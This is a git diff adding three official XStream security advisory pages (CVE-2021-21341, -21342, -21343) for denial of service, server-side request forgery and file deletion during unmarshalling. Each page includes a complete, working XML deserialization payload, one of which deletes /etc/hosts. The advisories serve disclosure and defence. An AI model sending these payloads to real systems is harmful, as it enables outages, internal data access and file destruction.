x-stream
diff --git a/‎xstream-distribution/src/content/CVE-2021-21341.html
Lines changed: 89 additions & 0 deletions b/‎xstream-distribution/src/content/CVE-2021-21341.html
Lines changed: 89 additions & 0 deletions
diff --git a/‎xstream-distribution/src/content/CVE-2021-21342.html
Lines changed: 83 additions & 0 deletions b/‎xstream-distribution/src/content/CVE-2021-21342.html
Lines changed: 83 additions & 0 deletions
diff --git a/‎xstream-distribution/src/content/CVE-2021-21343.html
Lines changed: 127 additions & 0 deletions b/‎xstream-distribution/src/content/CVE-2021-21343.html
Lines changed: 127 additions & 0 deletions
@@ -0,0 +1,89 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+ 
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+ 
+ Created on 10. January 2021 by Joerg Schaible
+ -->
+  <head>
+    <title>CVE-2021-21341</title>
+  </head>
+  <body>
+
+    <h2 id="vulnerability">Vulnerability</h2>
+    
+    <p>CVE-2021-21341: XStream can cause a Denial of Service.</p>
+	
+    <h2 id="affected_versions">Affected Versions</h2>
+    
+	<p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+	affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+	framework</a> with a whitelist limited to the minimal required types.</p>
+
+    <h2 id="description">Description</h2>
+    
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject a manipulated ByteArrayInputStream (or derived class), that can cause an endless
+    loop resulting in a denial of service.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple PriorityQueue and use XStream to marshal it to XML.  Replace the XML with following snippet and
+	unmarshal it again with XStream:</p>
+<div class="Source XML"><pre>&lt;java.util.PriorityQueue serialization='custom'&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class='javafx.collections.ObservableList$1'/&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+      &lt;dataHandler&gt;
+        &lt;dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'&gt;
+          &lt;is class='java.io.ByteArrayInputStream'&gt;
+            &lt;buf&gt;&lt;/buf&gt;
+            &lt;pos&gt;-2147483648&lt;/pos&gt;
+            &lt;mark&gt;0&lt;/mark&gt;
+            &lt;count&gt;0&lt;/count&gt;
+          &lt;/is&gt;
+          &lt;consumed&gt;false&lt;/consumed&gt;
+        &lt;/dataSource&gt;
+        &lt;transferFlavors/&gt;
+      &lt;/dataHandler&gt;
+      &lt;dataLen&gt;0&lt;/dataLen&gt;
+    &lt;/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+    <p>As soon as the XML gets unmarshalled, the an endless loop is entered and the executing thread consumes maximum
+    CPU time and will never return.</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU
+	type or parallel execution of such a payload resulting in a denial of	service only by manipulating the processed
+	input stream.</p>
+	
+    <h2 id="workarounds">Workarounds</h2>
+
+    <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+    <h2 id="credits">Credits</h2>
+    
+    <p>The vulnerability was discovered and reported by threedr3am.</p>
+    
+  	</body>
+ </html>
@@ -0,0 +1,83 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+ 
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+ 
+ Created on 12. January 2021 by Joerg Schaible
+ -->
+  <head>
+    <title>CVE-2021-21342</title>
+  </head>
+  <body>
+
+    <h2 id="vulnerability">Vulnerability</h2>
+    
+    <p>CVE-2021-21342: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+    from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+	
+    <h2 id="affected_versions">Affected Versions</h2>
+    
+	<p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+	affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+	framework</a> with a whitelist limited to the minimal required types.</p>
+
+    <h2 id="description">Description</h2>
+    
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple PriorityQueue and use XStream to marshal it to XML.  Replace the XML with following snippet and
+	unmarshal it again with XStream:</p>
+<div class="Source XML"><pre>&lt;java.util.PriorityQueue serialization='custom'&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'&gt;
+        &lt;indexMap class='com.sun.xml.internal.ws.client.ResponseContext'&gt;
+          &lt;packet&gt;
+            &lt;message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'&gt;
+              &lt;dataSource class='javax.activation.URLDataSource'&gt;
+                &lt;url&gt;http://localhost:8080/internal/:&lt;/url&gt;
+              &lt;/dataSource&gt;
+            &lt;/message&gt;
+          &lt;/packet&gt;
+        &lt;/indexMap&gt;
+      &lt;/comparator&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+    <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+	available only by manipulating the processed input stream.</p>
+
+    <h2 id="workarounds">Workarounds</h2>
+
+    <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+    <h2 id="credits">Credits</h2>
+    
+    <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+    
+  	</body>
+ </html>
@@ -0,0 +1,127 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+ 
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+ 
+ Created on 16. January 2021 by Joerg Schaible
+ -->
+  <head>
+    <title>CVE-2021-21343</title>
+  </head>
+  <body>
+
+    <h2 id="vulnerability">Vulnerability</h2>
+    
+    <p>CVE-2021-21343: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long
+    as the executing process has sufficient rights.</p>
+	
+    <h2 id="affected_versions">Affected Versions</h2>
+    
+	<p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+	affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+	framework</a> with a whitelist limited to the minimal required types.</p>
+
+    <h2 id="description">Description</h2>
+    
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject objects, that result in the deletion of a file on the local host.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple PriorityQueue and use XStream to marshal it to XML.  Replace the XML with following snippet and
+	unmarshal it again with XStream:</p>
+<div class="Source XML"><pre>&lt;java.util.PriorityQueue serialization='custom'&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'&gt;
+        &lt;indexMap class='com.sun.xml.internal.ws.client.ResponseContext'&gt;
+          &lt;packet&gt;
+            &lt;message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'&gt;
+              &lt;dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'&gt;
+                &lt;part&gt;
+                  &lt;dataHead&gt;
+                    &lt;tail/&gt;
+                    &lt;head&gt;
+                      &lt;data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'&gt;
+                        &lt;len&gt;3&lt;/len&gt;
+                        &lt;data&gt;AQID&lt;/data&gt;
+                      &lt;/data&gt;
+                    &lt;/head&gt;
+                  &lt;/dataHead&gt;
+                  &lt;contentTransferEncoding&gt;base64&lt;/contentTransferEncoding&gt;
+                  &lt;msg&gt;
+                    &lt;it class='java.util.ArrayList$Itr'&gt;
+                      &lt;cursor&gt;0&lt;/cursor&gt;
+                      &lt;lastRet&gt;1&lt;/lastRet&gt;
+                      &lt;expectedModCount&gt;4&lt;/expectedModCount&gt;
+                        &lt;outer-class&gt;
+                          &lt;com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/&gt;
+                          &lt;com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/&gt;
+                          &lt;com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/&gt;
+                          &lt;com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/&gt;
+                        &lt;/outer-class&gt;
+                    &lt;/it&gt;
+                    &lt;in class='java.io.FileInputStream'&gt;
+                      &lt;fd/&gt;
+                      &lt;channel class='sun.nio.ch.FileChannelImpl'&gt;
+                        &lt;closeLock/&gt;
+                        &lt;open&gt;true&lt;/open&gt;
+                        &lt;threads&gt;
+                          &lt;used&gt;-1&lt;/used&gt;
+                        &lt;/threads&gt;
+                        &lt;parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'&gt;
+                          &lt;sockClient&gt;
+                            &lt;fileName&gt;/etc/hosts&lt;/fileName&gt;
+                            &lt;unlinkFile&gt;true&lt;/unlinkFile&gt;
+                          &lt;/sockClient&gt;
+                          &lt;connectionSync/&gt;
+                        &lt;/parent&gt;
+                      &lt;/channel&gt;
+                      &lt;closeLock/&gt;
+                    &lt;/in&gt;
+                  &lt;/msg&gt;
+                &lt;/part&gt;
+              &lt;/dataSource&gt;
+            &lt;/message&gt;
+            &lt;satellites/&gt;
+            &lt;invocationProperties/&gt;
+          &lt;/packet&gt;
+        &lt;/indexMap&gt;
+      &lt;/comparator&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+    <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing
+	process has sufficient rights only by manipulating the processed input stream.</p>
+
+    <h2 id="workarounds">Workarounds</h2>
+
+    <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+    <h2 id="credits">Credits</h2>
+    
+    <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+    
+  	</body>
+ </html>